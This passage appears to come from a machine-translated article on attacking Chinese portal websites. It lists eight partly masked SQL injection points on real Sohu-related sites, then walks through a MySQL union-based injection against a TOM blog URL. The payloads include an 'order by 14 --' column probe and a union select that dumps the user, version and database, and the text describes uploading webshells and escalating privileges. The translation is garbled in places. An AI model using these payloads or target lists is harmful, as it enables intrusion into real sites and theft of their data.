Although the Administrator passwords are all encrypted by MD5, there are 20 Gbit/s of rainbow table downloads on the Internet. It is not difficult to crack the MD5 values of these common passwords. Through Background login, attackers can find ways to upload webshells and perform Elevation of Privilege and further penetration intrusion operations.
In addition, there are many SQL injection points on the Sohu website, for example:
Injection Point 1 (Figure 3): http://card.money. ***. com/yh/card_product.php? Id = 71
Injection Point 2: http://blog.club. ***. com/list_diary_detail.php? Artid = 43761 & db = blog002P4 & kindid = 3403
Injection Point 3: http://blog.club. ***. com/list_diary.php? Db = blog001P3 & kindid = 529
Injection Point 4: http: // mini *** .163.com/2009/0909/wuliangye/article.php? Id = 13
Injection Point 5: http://blog.club. ***. com/list_diary.php? Db = blog001P3 & kindid = 529
Injection Point 6: http://people.business. ***. com/person/plist. php? Userid = 2047
Injection Point 7: http://minisite.it. ***. com/minisite/site849/photodetail1.jsp? CorpID = 849 & status = browse & privCode = 04 & pictureID = 57275
Injection point 8: http://zj.svip. ****. com/news/2010/duanxindasai/item_list.php? Category_id = 1905
Figure 3 Sohu injection point query database information
2. MySQL injection test TOM portal website
TOM is also a major portal website in China. Many serious SQL injection vulnerabilities have been found during the detection of TOM portal websites, which are extremely harmful, attackers can log on to the background to upload Trojans to obtain webshells and further control the entire website server!
The TOM website's injection point address is:
Http: // qd ** .tom.com/blog_content.php? Blogid = 482
When Order by is directly used for query, an error will occur and the page will jump to the website homepage. You can use the -- terminator to partition and perform the following query:
Http: // qd ** .tom.com/blog_content.php? Blogid = 482 order by 14 --
Return to the normal page. The number of fields is 14. Execute the following query (figure 4 ):
Http: // qd ** .tom.com/blog_content.php? Blogid = 482 and 1 = 2 union select 1, 2, 3, group_concat (user (), 0x7C7C, version (), 0x7C7C, database, 12,13, 14% 20 --
Figure 4 union query for database information